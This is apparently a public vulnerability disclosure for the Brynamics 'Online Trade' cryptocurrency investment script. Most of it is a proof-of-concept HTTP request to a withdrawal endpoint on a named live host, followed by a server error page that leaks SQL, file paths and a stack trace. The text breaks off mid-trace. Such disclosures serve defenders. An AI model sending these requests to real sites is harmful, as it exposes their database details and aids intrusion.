# Vendor Homepage: https://codecanyon.net/item/online-trade-online-forex-and-cryptocurrency-investment-system/21987193?s_rank=14 # Version: 1 # Tested on: Kali Linux # Description :. Brynamics "Online Trade - Online trading and cryptocurrency investment system" allows remote attackers to obtain sensitive information via a direct request for /dashboard/addplan, /dashboard /paywithcard/charge, /dashboard/withdrawal, or /privacy& terms, as demonstrated by reading database username, database password, database_name, and IP address fields, a related issue to CVE-2018-12908. # POC : # Request : =================== POST /dashboard/withdrawal HTTP/1.1 Host: www.trade.brynamics.xyz Accept-Encoding: gzip, deflate Referer: http://www.trade.brynamics.xyz/dashboard/withdrawals Content-Type: application/x-www-form-urlencoded Content-Length: 112 Cookie: XSRF-TOKEN=eyJpdiI6IlAwSjE2SjE1REVUdTM0bXhsMDY1b3c9PSIsInZhbHVlIjoiN204d3RFcmdOSFVmTEo2cGh5bFlxY3RlR0p2U2hoN3NkNDZ5Vit3MjdpS3B2RHJGaVFZdzlKNmFyN25RbWJLRnZtT3FaTDVvbHV4Ym9HMmFiWlhGY0E9PSIsIm1hYyI6ImZmNTFhOGJkMmYxMTBlMGRjZDU4YzQ5MTI3NTljN2JiOGYyODc3MTExYjhjMzFiZTNkNWMzZjc5YjVlYTUyODEifQ%3D%3D; laravel_session=eyJpdiI6IjZycklXVDNRTWsrT0NsZ3A2ZnIrWFE9PSIsInZhbHVlIjoiRzdCVlJzXC81VWdSWHlkSys2K3dtR2h3UnpzZzhjT1wvdDZtZ3BOMXpjU09SMTJDTGdXeEhSWkhadGt0RnhPRDR3MWZreXlLOTA1RDNIQStIZFpxRG5OZz09IiwibWFjIjoiNTkwYzU3ZGMxOTg3NWU1ZWFjNjVjNjNkN2VjODkzYTBjZDI3MTAxNWJmZTUzN2VhZDRlNzEyMDcyODk5ZmFlZiJ9; __tawkuuid=e::trade.brynamics.xyz::3PC5vtdJoz40C7aJUDGFFuGkOrICf13gr5+ReA6AWqfUvhPDsTAf982UcNP+u5nq::2; TawkConnectionTime=0 amount=555-555-0199@example.com&payment_mode=Bitcoin&method_id=2&_token=VG4OwJ1Dxx0kDSA3JCp0JtHDMX3TI5WpXE6nTDWi =================== # Response : =================== HTTP/1.1 500 Internal Server Error Date: Mon, 16 Jul 2018 11:14:58 GMT Server: Apache X-Powered-By: PHP/7.0.30 Cache-Control: no-cache, private Set-Cookie: XSRF-TOKEN=eyJpdiI6InFCYjRod1NscTk1UnBZYkxPVXo1a0E9PSIsInZhbHVlIjoieFBBQU1lZ3k1aVwvR2tKYkVmZ2o4MkdmbVFYcWxLUlFIYkdDU1kzQ1lnWGd4YmdLZ0VPK3dGeWxYWmROTGZYQmlLdzdBM1IwcTd3SStQNk5sbzZxblVBPT0iLCJtYWMiOiJkMmExOWU3NDM5MmM5NTgyNTBjMDBmNDZiZTFlYTMwNzkxZjYzNjZiYzE1ZDc4MDJmODk4NTJhZmViZDg4MGFkIn0%3D; expires=Mon, 16-Jul-2018 13:14:59 GMT; Max-Age=7200; path=/ Set-Cookie: laravel_session=eyJpdiI6InlHMlp5Mm5RTDVpRjRYT1NEQ0JGc2c9PSIsInZhbHVlIjoicEVWQW5xbHB6QlhWNlZ4a2xNM3pCU1VqYTkzWU9KN2ZQTytmbW1qRzF4VHF1eld0UStuQ2hVSmNkZjFkbXRiTHlva1ZITTFHcDdLZVpKQWZqMFJtSUE9PSIsIm1hYyI6IjdkN2NkMTY4N2VkOGVlZDA2NDQ0Y2IzZjU4MzE1NzhjMGM3ZmU3NjVmYTMyM2M1MmQ3ZTYyNmEzNzc2MTVmZDIifQ%3D%3D; expires=Mon, 16-Jul-2018 13:14:59 GMT; Max-Age=7200; path=/; HttpOnly Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 708733 <!DOCTYPE html><!-- Illuminate\Database\QueryException: SQLSTATE[22001]: String data, right truncated: 1406 Data too long for column &#039;amount&#039; at row 1 (SQL: insert into `withdrawals` (`amount`, `to_deduct`, `payment_mode`, `status`, `user`, `updated_at`, `created_at`) values (555-555-0199@example.com, 620.5, Bitcoin, Pending, 182, 2018-07-16 11:14:59, 2018-07-16 11:14:59)) in file /home/torrpgug/trade.brynamics.xyz/vendor/laravel/framework/src/Illuminate/Database/Connection.php on line 664 Stack trace: 1. Illuminate\Database\QueryException-&gt;() /home/torrpgug/trade.brynamics.xyz/vendor/laravel/framework/src/Illuminate/Database/Connection.php:664 2. PDOException-&gt;() /home/torrpgug/trade.brynamics.xyz/vendor/laravel/framework/src/Illuminate/Database/Connection.php:458 3. PDOStatement-&gt;execute() /home/torrpgug/trade.brynamics.xyz/vendor/laravel/framework/src/Illuminate/Database/Connection.php:458 4. Illuminate\Database\Connection-&gt;Illuminate\Database\{closure}() /home/torrpgug/trade.brynamics.xyz/vendor/laravel/framework/src/Illuminate/Database/Connection.php:657 5. Illuminate\Database\Connection-&gt;runQueryCallback() /home/torrpgug/trade.brynamics.xyz/vendor/laravel/framework/src/Illuminate/Database/Connection.php:624 6. Illuminate\Database\Connection-&gt;run() /home/torrpgug/trade.brynamics.xyz/vendor/laravel/framework/src/Illuminate/Database/Connection.php:459 7. Illuminate\Database\Connection-&gt;statement() /home/torrpgug/trade.brynamics.xyz/vendor/laravel/framework/src/Illuminate/Database/Connection.php:411 8. Illuminate\Database\Connection-&gt;insert() /home/torrpgug/trade.brynamics.xyz/vendor/laravel/framework/src/Illuminate/Database/Query/Processors/Processor.php:32